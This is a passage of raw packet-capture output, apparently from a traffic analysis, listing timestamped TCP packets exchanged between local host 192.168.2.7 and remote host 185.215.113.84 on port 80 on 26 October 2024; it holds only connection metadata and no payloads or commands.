Oct 26, 2024 07:27:20.400615931 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.400625944 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.400629997 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.400644064 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.400649071 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.400662899 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.400696039 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.401006937 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.401021957 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.401038885 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.401042938 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.401057959 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.401082039 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.401104927 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.401120901 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.401138067 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.401139975 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.401164055 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.401202917 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.443550110 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.443571091 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.443587065 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.443662882 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.443679094 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.443696022 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.443703890 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.443713903 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.443742037 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.443766117 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.470587969 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.470602989 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.470614910 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.470638037 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.470649958 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.470666885 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.470680952 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.470710993 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.470726967 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.470869064 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.470881939 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.470892906 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.470910072 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.470937014 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.471358061 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.471380949 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.471396923 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.471401930 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.471402884 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.471419096 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.471441031 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.471472979 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.471493006 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.471512079 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.471515894 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.471538067 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.471554995 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.471589088 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.471609116 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.471622944 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.471626997 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.471637011 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.471647024 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.471659899 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.471681118 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.471858978 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.471870899 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.471899986 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.471908092 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.471910000 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.471920013 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.471946001 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.471959114 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.477128983 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.477138996 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.477153063 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.477166891 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.477237940 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.477252007 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.477257967 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.477300882 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.477328062 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.516772032 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.516845942 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.516859055 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.516871929 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.516913891 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.516913891 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.516936064 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.516936064 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.516940117 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.516952991 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.516984940 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.516993999 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.517005920 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.517024040 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.517025948 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.517035961 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.517039061 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.517065048 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.517061949 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.517083883 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.517098904 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.517115116 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.517137051 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.517138004 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.517148972 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.517179012 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.517189980 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.517333984 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.517350912 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.517364025 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.517375946 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.517380953 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.517390013 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.517410994 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.517432928 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.517636061 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.517647028 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.517659903 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.517672062 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.517678976 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.517704010 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.517726898 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.517787933 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.517829895 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.517832041 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.517841101 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.517873049 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.517894983 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.517908096 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.517920017 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.517946959 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.517946959 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.518196106 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.518207073 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.518218994 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.518239021 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.518261909 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.518265009 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.518277884 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.518289089 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.518302917 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.518309116 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.518318892 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.518325090 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.518331051 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.518337965 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.518352032 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.518362045 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.518373966 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.518385887 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.518393040 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.518408060 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.518430948 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.561279058 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.561292887 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.561305046 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.561341047 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.561352015 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.561372042 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.561414003 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.588310957 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.588325024 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.588335991 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.588349104 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.588367939 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.588378906 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.588396072 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.588396072 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.588408947 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.588413954 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.588426113 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.588444948 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.588445902 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.588470936 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.588495970 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.588527918 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.588537931 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.588567019 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.588602066 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.588612080 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.588684082 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.588938951 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.588951111 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.588963985 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.588975906 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.588984013 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.588995934 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.589021921 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.589025974 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.589036942 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.589068890 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.589109898 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.589123964 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.589137077 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.589147091 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.589152098 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.589174032 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.589199066 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.589329004 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.589340925 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.589370012 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.589373112 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.589390039 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.589401007 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.589411020 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.589420080 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.589447021 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.594911098 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.594952106 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.594963074 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.594986916 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.595000982 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.595019102 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.595043898 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.595056057 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.595082998 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.595094919 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.634476900 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.634500980 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.634510040 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.634516954 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.634524107 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.634531021 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.634531975 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.634552002 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.634573936 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.634578943 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.634613991 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.634743929 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.634783030 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.634821892 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.634835005 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.634851933 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.634862900 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.634865046 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.634874105 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.634876013 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.634887934 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.634896994 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.634897947 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.634926081 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.634943008 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.635258913 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.635271072 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.635281086 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.635297060 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.635298014 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.635310888 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.635322094 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.635330915 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.635344028 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.635361910 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.635376930 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.635390043 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.635400057 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.635411978 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.635416031 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.635430098 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.635445118 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.635759115 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.635771036 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.635782003 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.635797977 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.635819912 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.635823011 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.635833979 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.635847092 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.635855913 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.635883093 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.635909081 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.635920048 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.635931015 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.635945082 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.635945082 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.635957003 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.635970116 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.635971069 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.636003971 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.636015892 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.636497974 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.636509895 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.636522055 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.636547089 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.636562109 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.636573076 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.636575937 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.636585951 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.636599064 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.636630058 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.679013968 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.679028034 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.679044962 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.679056883 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.679069042 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.679079056 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.679106951 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.706017017 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.706032038 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.706043005 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.706063032 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.706072092 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.706074953 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.706089020 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.706099033 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.706101894 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.706130981 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.706131935 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.706156015 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.706170082 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.706182003 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.706212044 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.706221104 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.706223965 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.706248045 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.706259966 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.706487894 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.706522942 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.706532001 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.706536055 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.706562042 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.706576109 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.706590891 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.706603050 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.706614971 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.706634998 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.706660032 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.706831932 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.706842899 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.706852913 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.706872940 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:20.706897974 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:20.706899881 CEST	49982	80	192.168.2.7	185.215.113.84
